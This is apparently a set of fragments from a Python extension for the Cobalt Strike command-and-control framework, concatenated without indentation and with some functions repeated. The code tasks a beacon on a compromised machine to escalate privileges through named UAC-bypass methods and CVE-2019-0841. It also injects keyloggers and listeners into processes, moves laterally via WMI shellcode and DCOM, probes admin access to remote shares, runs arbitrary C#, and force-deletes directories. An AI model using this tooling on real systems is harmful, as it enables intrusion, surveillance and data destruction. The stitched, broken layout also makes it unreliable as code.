def _(bid, code, *args):
aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code))
try:
sharpgen.execute(bid, code, *args)
except RuntimeError as e:
aggressor.berror(
bid, 'SharpGen failed. See script console for more details')
def _(bid, exploit, *args):
callbacks = {
'token-shellcode': elevate_token_shellcode,
'token-command': elevate_token_command,
'slui-shellcode': elevate_slui_shellcode,
'slui-command': elevate_slui_command,
'fodhelper-shellcode': elevate_fodhelper_shellcode,
'fodhelper-command': elevate_fodhelper_command,
'eventvwr-command': elevate_eventvwr_command,
'wscript-shellcode': elevate_wscript_shellcode,
'wscript-command': elevate_wscript_command,
'runas-shellcode': elevate_runas_shellcode,
'cve-2019-0841': elevate_cve_2019_0841,
}
if exploit in callbacks:
aggressor.btask(
bid, 'Tasked beacon to elevate with exploit: {}'.format(exploit))
callback = callbacks[exploit]
if not pycobalt.utils.check_args(callback, (bid, ) + args):
signature = pycobalt.utils.signature(callback, trim=1)
aggressor.berror(
bid, 'Invalid arguments to exploit {}. Signature: {}'.format(
exploit, signature))
return
callback(bid, *args)
else:
aggressor.berror(
bid,
'Exploit must be one of: {}'.format(', '.join(callbacks.keys())))
def alias_callback(*args):
# first argument is bid
bid = int(args[0])
# see above
quote_replacement = quote_replacement_
# check arguments
if not utils.check_args(callback, args):
syntax = '{} {}'.format(name, utils.signature_command(callback, trim=1))
aggressor.berror(bid, "Syntax: " + syntax)
engine.error("Invalid number of arguments passed to alias '{}'. Syntax: {}".format(name, syntax))
return
# handle the quote replacement character
if not quote_replacement:
global _default_quote_replacement
quote_replacement = _default_quote_replacement
if quote_replacement:
args = [arg.replace(quote_replacement, '"') for arg in args]
try:
# run the alias callback
#engine.debug('calling callback for alias {}'.format(name))
callback(*args)
except Exception as e:
# print exception summaries to the beacon log. raise the
# Exception again so the full traceback can get printed to the
# Script Console
aggressor.berror(bid,
"Caught Python exception while executing alias '{}': {}\n See Script Console for more details.".format(name, str(e)))
raise e
def _(bid, shellcode, *hosts):
if not hosts:
aggressor.berror(bid, 'specify some hosts')
return
for host in hosts:
lateral_wmi_shellcode(bid, host, shellcode)
def _(bid, *files):
if not files:
aggressor.berror('cat: specify some files to cat')
return
command = '\n'.join(['type {}'.format(f) for f in files])
aggressor.bshell(bid, command)
def error(self, message):
if self.bid:
# print to beacon console
aggressor.berror(self.bid, message)
else:
# print to script console
engine.error(message)
raise argparse.ArgumentError('exit')
def _(bid):
global _uploaded
if not _uploaded:
aggressor.berror('Run 7z-init first')
return
aggressor.brm(bid, _uploaded)
_uploaded = None
def _(bid, *dirs):
if not dirs:
aggressor.berror('rmr: specify some directories to kill')
return
command = ''
for d in dirs:
command += 'Remove-Item -Recurse -Force "{}"\n'.format(d)
aggressor.bpowerpick(bid, command)
def _(bid, code, *args):
aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code))
try:
from_cache = sharpgen.execute(bid, code, args, cache=cache)
if from_cache:
aggressor.blog2(bid, 'Build was retrieved from the cache')
except RuntimeError as e:
aggressor.berror(
bid, 'SharpGen failed. See Script Console for more details.')
def callback(procs):
if procs:
for proc in procs:
out = 'Found {}: {}'.format(proc_name, proc['pid'])
if 'arch' in proc:
out += ' ({})'.format(proc['arch'])
if 'user' in proc:
out += ' ({})'.format(proc['user'])
aggressor.blog2(bid, out)
else:
aggressor.berror(bid, 'No processes named {}'.format(proc_name))
def _(bid, *dirs):
if not dirs:
aggressor.berror(bid, 'rmr: specify some directories to kill')
return
command = ''
for d in dirs:
command += 'Remove-Item -Recurse -Force {}\n'.format(
powershell_quote(d))
aggressor.btask(
bid, 'Tasked beacon to recursively delete: {}'.format(', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *hosts):
command = ''
if not hosts:
aggressor.berror('specify a host')
return
for host in hosts:
command += 'nslookup {}\n'.format(powershell_quote(host))
aggressor.btask(
bid, 'Tasked beacon to resolve host(s): {}'.format(', '.join(hosts)))
aggressor.bpowerpick(bid, command, silent=True)
def callback(procs):
if procs:
for proc in procs:
out = 'Killing {}: {}'.format(proc_name, proc['pid'])
if 'arch' in proc:
out += ' ({})'.format(proc['arch'])
if 'user' in proc:
out += ' ({})'.format(proc['user'])
aggressor.btask(bid, out)
aggressor.bkill(bid, proc['pid'], silent=True)
else:
aggressor.berror(bid, 'No processes named {}'.format(proc_name))
def _(bid, *args):
global _uploaded
if not _uploaded:
aggressor.berror('Run 7z-init first')
return
line = ' '.join(args)
aggressor.btask(bid, 'Tasked beacon to run 7zip command: {}'.format(line))
aggressor.bpowerpick(
bid,
"echo '7zip starting'; {} {} ; echo '7zip finished';".format(
_uploaded, line),
silent=True)
def _(bid, *files):
if not files:
aggressor.berror(bid, 'cat: specify some files to cat')
return
code = helpers.code_string(r"""
foreach (string file in args) {
var text = System.IO.File.ReadAllText(file);
System.Console.Write(text);
}
""")
aggressor.btask(
bid, 'Tasked beacon to get contents of: {}'.format(', '.join(files)))
sharpgen.execute(bid, code, files)
def parsed_callback(procs):
found = None
for search in proc_names:
for proc in procs:
if search == proc['name'] and 'arch' in proc and 'user' in proc:
# inject it
aggressor.blog(
bid, 'Keylogging process {} ({} {})'.format(
proc['name'], proc['pid'], proc['arch']))
aggressor.bkeylogger(bid,
proc['pid'],
proc['arch'],
silent=True)
return
# nothing found
aggressor.berror(bid, "Didn't find any processes to inject keylogger")
def parsed_callback(procs):
found = None
for search in proc_names:
for proc in procs:
if search == proc['name'] and 'arch' in proc and 'user' in proc:
# inject it
aggressor.blog(
bid,
'Injecting listener {} into process {} ({} {})'.format(
listener, proc['name'], proc['pid'], proc['arch']))
aggressor.binject(bid, proc['pid'], listener, proc['arch'])
return
# nothing found
aggressor.berror(
bid,
"Didn't find any processes to inject listener {}".format(listener))
def _(bid):
loaded = aggressor.data_query('cmdlets')
if bid in loaded:
out = 'Loaded modules:\n'
for module in loaded[bid]:
if module.lower() in [
'local', 'that', 'struct', 'field', 'before', 'psenum',
'func', ''
]:
# not sure what these are
continue
out += ' - {}\n'.format(module)
aggressor.blog2(bid, out)
else:
aggressor.berror(bid, 'No loaded modules')
def _(bid, method, host, *args):
callbacks = {
'wmi-shellcode': lateral_wmi_shellcode,
}
if method in callbacks:
aggressor.btask(bid, 'Tasked beacon to move laterally with method: {}'.format(method))
callback = callbacks[method]
if not pycobalt.utils.check_args(callback, (bid, host) + args):
signature = pycobalt.utils.signature(callback, trim=2)
aggressor.berror(bid, 'Invalid arguments to method {}. Signature: {}'.format(method, signature))
return
host = host.lstrip('\\')
callback(bid, host, *args)
else:
aggressor.berror(bid, 'method must be one of: {}'.format(', '.join(callbacks.keys())))
def alias_callback(*args):
bid = int(args[0])
if utils.check_args(callback, args):
try:
engine.debug('calling callback for alias {}'.format(name))
callback(*args)
except Exception as e:
aggressor.berror(
bid,
"Caught Python exception while executing alias '{}': {}\n See Script Console for more details."
.format(name, str(e)))
raise e
else:
syntax = '{}{}'.format(name, utils.signature(callback, trim=1))
aggressor.berror(bid, "Syntax: " + syntax)
engine.error(
"Invalid number of arguments passed to alias '{}'. Syntax: {}".
format(name, syntax))
def _(bid, *hosts):
command = ''
if not hosts:
aggressor.berror(bid, 'Specify some hosts to check admin access to')
for host in hosts:
host = host.lstrip('\\')
command += helpers.code_string(r"""
ls \\{host}\C$ >$null 2>$null
if ($?) {{
Write-Output "You have admin access to \\{host}"
}} else {{
Write-Output "You do not have access to \\{host}: $($Error[0].Exception.Message)"
}}
""", host=host)
aggressor.btask(bid, 'Tasked beacon to check access to: ' + ', '.join(hosts))
aggressor.bpowerpick(bid, command, silent=True)
def parsed_callback(procs):
for proc in procs:
if 'arch' in proc and 'user' in proc:
# inject it
aggressor.blog(
bid, 'Keylogging process {} ({} {})'.format(
proc['name'], proc['pid'], proc['arch']))
aggressor.bkeylogger(bid,
proc['pid'],
proc['arch'],
silent=True)
return
# nothing found
if proc_name:
aggressor.berror(
"Didn't find any processes named '{}' to inject keylogger".
format(proc_name))
else:
aggressor.berror("Didn't find any processes to inject keylogger")
def _(bid, listener=None, *proc_names):
if not proc_names:
# defaults
proc_names = default_procs
if not listener:
# select default listener
listener = helpers.default_listener()
if listener not in aggressor.listeners():
# listener not recognized
aggressor.berror(bid, 'Unknown listener: {}'.format(listener))
return
def parsed_callback(procs):
found = None
for search in proc_names:
for proc in procs:
if search == proc['name'] and 'arch' in proc and 'user' in proc:
# inject it
aggressor.blog(
bid,
'Injecting listener {} into process {} ({} {})'.format(
listener, proc['name'], proc['pid'], proc['arch']))
aggressor.binject(bid, proc['pid'], listener, proc['arch'])
return
# nothing found
aggressor.berror(
bid,
"Didn't find any processes to inject listener {}".format(listener))
def ps_callback(bid, content):
procs = helpers.parse_ps(content)
parsed_callback(procs)
aggressor.btask(
bid,
'Tasked beacon to inject listener {} into first accessible process named: {}'
.format(listener, ', '.join(proc_names)))
aggressor.bps(bid, ps_callback)
def do_dcom(listener):
if not aggressor.listener_info(listener):
aggressor.berror(bid, "Listener {} does not exist".format(listener))
return
aggressor.btask(bid, 'Tasked Beacon to spawn beacon on host "{}" for listener {} using DCOM'.format(target, listener))
def _(bid, *args):
msg = ' '.join(args)
aggressor.berror(bid, msg)
